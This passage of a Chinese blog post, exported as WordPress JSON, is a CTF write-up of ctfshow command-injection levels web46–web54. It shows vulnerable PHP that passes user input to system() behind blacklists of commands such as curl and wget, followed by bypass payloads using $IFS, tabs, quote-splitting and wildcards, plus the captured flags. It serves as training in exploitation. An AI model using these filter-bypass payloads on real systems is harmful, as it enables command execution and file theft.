    $IFS \u662f\u4e00\u79cd set \u53d8\u91cf\uff0c\u5f53 shell \u5904\u7406\"\u547d\u4ee4\u66ff\u6362\"\u548c\"\u53c2\u6570\u66ff\u6362\"\u65f6\uff0cshell \u6839\u636e IFS \u7684\u503c\uff0c\u9ed8\u8ba4\u662f space,tab, newline \u5373\u7a7a\u683c\uff0c\u5236\u8868\u7b26\uff0c\u7a7a\u884c\u6765\u62c6\u89e3\u8bfb\u5165\u7684\u53d8\u91cf\uff0c\u7136\u540e\u5bf9\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u5904\u7406\uff0c\u6700\u540e\u91cd\u65b0\u7ec4\u5408\u8d4b\u503c\u7ed9\u8be5\u53d8\u91cf\u3002\u76f4\u63a5\u7528$IFS\u7684\u8bdd\uff0c\u4f1a\u8ba4\u4e3a\u89e3\u6790\u6ca1\u7ed3\u675f\uff0c\u4f1a\u628a\u540e\u9762\u7684\u4e5f\u5f53\u505a\u53c2\u6570\u89e3\u6790\uff0c\u6bd4\u5982cat$IFSflag.php\uff0c\u4f1a\u628aIFSflag\u4e00\u8d77\u5f53\u53d8\u91cf\u89e3\u6790\u3002\u8fd9\u65f6\u5019\u9700\u8981\u5728$IFS\u540e\u9762\u8fdb\u884c\u622a\u65ad\uff0c\u4f7f\u89e3\u6790\u4e3a\u7a7a\uff0c\u7ed3\u675f $IFS\uff0c\u6b63\u5e38\u6267\u884c\u540e\u9762\u7684\u5185\u5bb9\u3002<\/code><\/pre>\n<\/blockquote>\n
    Hint<\/h2>\n
    echo$IFS`tac$IFS*`%0A<\/code><\/pre>\n
    web46<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\\\$|\\*\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u8fc7\u6ee4\u4e86\u6570\u5b57\u8fd8\u6709\u901a\u914d\u7b26<\/p>\n
    payload:\/?c=tac%09fla?.php%0a   <\/code><\/pre>\n
    $flag="ctfshow{a07543fe-fc34-4be7-a81e-8d832348b2b9}"; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-05 20:49:53 # @Last Modified by: h1xa # @Date: 2020-09-05 20:49:44 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n
    Hint<\/h2>\n
    nl<fla''g.php||<\/code><\/pre>\n
    web47<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u8fc7\u6ee4\u4e86\u5f88\u591a\uff0c\u4f46\u662f\u4e0a\u4e00\u9898\u7684payload\u8fd8\u53ef\u4ee5\u7528\uff1a<\/p>\n
    \/?c=tac%09fla?.php%0a<\/code><\/pre>\n
    Hint<\/h2>\n
    nl<fla''g.php||<\/code><\/pre>\n
    web48<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u8fd8\u662f\u4e0a\u4e00\u628a\u7684payload\uff1a<\/p>\n
    \/?c=tac%09fla?.php%0a<\/code><\/pre>\n
    $flag="ctfshow{660fce57-757f-4e33-bb7e-a972a40ca0d7}"; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-05 20:49:53 # @Last Modified by: h1xa # @Date: 2020-09-05 20:49:44 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n
    Hint<\/h2>\n
    nl<fla''g.php||<\/code><\/pre>\n
    web49<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \/?c=tac%09fla?.php%0a<\/code><\/pre>\n
    \u4e0b\u4e00\u9898\uff01<\/p>\n
    $flag="ctfshow{cc72b2c2-67dc-40da-85e2-0162238014f3}"; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-05 20:49:53 # @Last Modified by: h1xa # @Date: 2020-09-05 20:49:44 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n
    Hint<\/h2>\n
    nl<fla''g.php||<\/code><\/pre>\n
    web50<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%|\\x09|\\x26\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u7ee7\u7eed\u4e00\u628a\u68ad\u5c31\uff0cwoc\uff0c\u8fc7\u6ee4\u4e86%09<\/code>\uff0c\u88c2\u5f00\u4e86\u3002<\/p>\n
    payload:\/?c=tac<fla''g.php||<\/code><\/pre>\n
    $flag="ctfshow{b0ed4e9a-e7eb-44bb-9872-47efa6657b69}"; *\/ # @link: https:\/\/ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-05 20:49:53 # @Last Modified by: h1xa # @Date: 2020-09-05 20:49:44 # @Author: h1xa # -*- coding: utf-8 -*- \/*<\/code><\/pre>\n
    Hint<\/h2>\n
    nl<fla''g.php||<\/code><\/pre>\n
    web51<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\\`|\\%|\\x09|\\x26\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u8fc7\u6ee4\u4e86tac\uff0c\u7528nl:<\/p>\n
    payload:\/?c=nl<>fla''g.php||<\/code><\/pre>\n
    \u67e5\u770b\u6e90\u4ee3\u7801\u5f97\u5230flag:<\/p>\n
         1  <?php\n     2  \n     3  \/*\n     4  # -*- coding: utf-8 -*-\n     5  # @Author: h1xa\n     6  # @Date:   2020-09-05 20:49:44\n     7  # @Last Modified by:   h1xa\n     8  # @Last Modified time: 2020-09-05 20:49:53\n     9  # @email: h1xa@ctfer.com\n    10  # @link: https:\/\/ctfer.com\n    11  \n    12  *\/\n    13  \n    14  \n    15  $flag="ctfshow{250ebbae-1984-4217-a620-4d7ba51a90bf}";<\/code><\/pre>\n
    Hint<\/h2>\n
    nl<fla''g.php||<\/code><\/pre>\n
    web52<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\\`|\\%|\\x09|\\x26|\\>|\\<\/i", $c)){\n        system($c." >\/dev\/null 2>&1");\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u8fc7\u6ee4\u4e86<<\/code>\u548c><\/code>\uff0c\u4f46\u662f\u653e\u51fa\u6765\u4e86$<\/code><\/p>\n
    payload:\/?c=nl${IFS}fla%27%27g.php||<\/code><\/pre>\n
    \u67e5\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n
         1  <?php\n     2  \n     3  \/*\n     4  # -*- coding: utf-8 -*-\n     5  # @Author: h1xa\n     6  # @Date:   2020-09-05 20:49:44\n     7  # @Last Modified by:   h1xa\n     8  # @Last Modified time: 2020-09-05 20:49:53\n     9  # @email: h1xa@ctfer.com\n    10  # @link: https:\/\/ctfer.com\n    11  \n    12  *\/\n    13  \n    14  \n    15  $flag="flag_here";<\/code><\/pre>\n
    \u8bd5\u90fd\u4e0d\u7528\u8bd5\u5c31\u77e5\u9053\u4e0d\u5bf9\u52b2\u4e86\uff0c\u67e5\u770b\u76ee\u5f55\uff1a<\/p>\n
    \/?c=ls${IFS}..\/..\/..\/..\/||<\/code><\/pre>\n
    bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var<\/code><\/pre>\n
    \u770b\u5230\u8fd9\u91cc\u6709\u4e00\u4e2aflag\uff0c\u8bbf\u95ee\uff1a<\/p>\n
    nl$IFS..\/..\/..\/..\/fla''g||<\/code><\/pre>\n
    1 ctfshow{e058648b-a649-4b60-a9af-e913eb9b6777}<\/code><\/pre>\n
    Hint<\/h2>\n
    nl$IFS\/fla''g||<\/code><\/pre>\n
    web53<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|cat|flag| |[0-9]|\\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\\`|\\%|\\x09|\\x26|\\>|\\<\/i", $c)){\n        echo($c);\n        $d = system($c);\n        echo "<br>".$d;\n    }else{\n        echo 'no';\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u76f4\u63a5\u5c06c\u653e\u5230system<\/code>\u91cc\u53bb\u4e86\uff0c\u90a3\u5c31\u8bd5\u8bd5\uff1a<\/p>\n
    payload:\/?c=nl${IFS}fl''ag.php<\/code><\/pre>\n
    \u6210\u529f\uff01\uff01\uff01<\/p>\n
    nl${IFS}fl''ag.php 1 15 $flag="ctfshow{78419578-78c5-442f-bb38-00fb7b34bd38}";<\/code><\/pre>\n
    Hint<\/h2>\n
    c''at${IFS}fla''g.p''hp<\/code><\/pre>\n
    web54<\/h1>\n
    <?php\nif(isset($_GET['c'])){\n    $c=$_GET['c'];\n    if(!preg_match("\/\\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\\`|\\%|\\x09|\\x26|\\>|\\<\/i", $c)){\n        system($c);\n    }\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n
    \u9898\u76ee\u5f00\u59cb\u75af\u72c2\u4f7f\u7528\u901a\u914d\u7b26\uff0c\u88c2\u5f00\u4e86\u8981\uff01\uff01\uff01\u770b\u4e86\u5e08\u5085\u4eec\u7684wp\u662f\u5c06\u6587\u4ef6\u91cd\u547d\u540d\u4e86\uff01<\/p>\n
    payload:\/?c=mv${IFS}fla?.php${IFS}a.txt\n        \/a.txt<\/code><\/pre>\n
    <?php\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date:   2020-09-07 19:40:53\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-07 19:41:00\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n*\/\n$flag="ctfshow{d853cbde-26be-4c52-b99c-3feb43fc0850}";<\/code><\/pre>\n
    Hint<\/h2>\n
    \/bin\/?at${IFS}f???????<\/code><\/pre>\n
    \u522b\u7684\u601d\u8def<\/h2>\n
    \u770b\u5230\u522b\u7684\u5e08\u5085\u8fd9\u91cc\u4f7f\u7528\u4e86\u53e6\u4e00\u79cd\u89e3\u6cd5\uff1a<\/p>\n
    \/?c=grep${IFS}show${IFS}fl?g.php<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
    web29 \u547d\u4ee4\u6267\u884c\uff0c\u9700\u8981\u4e25\u683c\u7684\u8fc7\u6ee4 <?php error_reporting(0); if(isse […]<\/p>\n","protected":false},"author":1,"featured_media":268,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-267","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=267"}],"version-history":[{"count":3,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/267\/revisions"}],"predecessor-version":[{"id":273,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/267\/revisions\/273"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/268"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=267"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}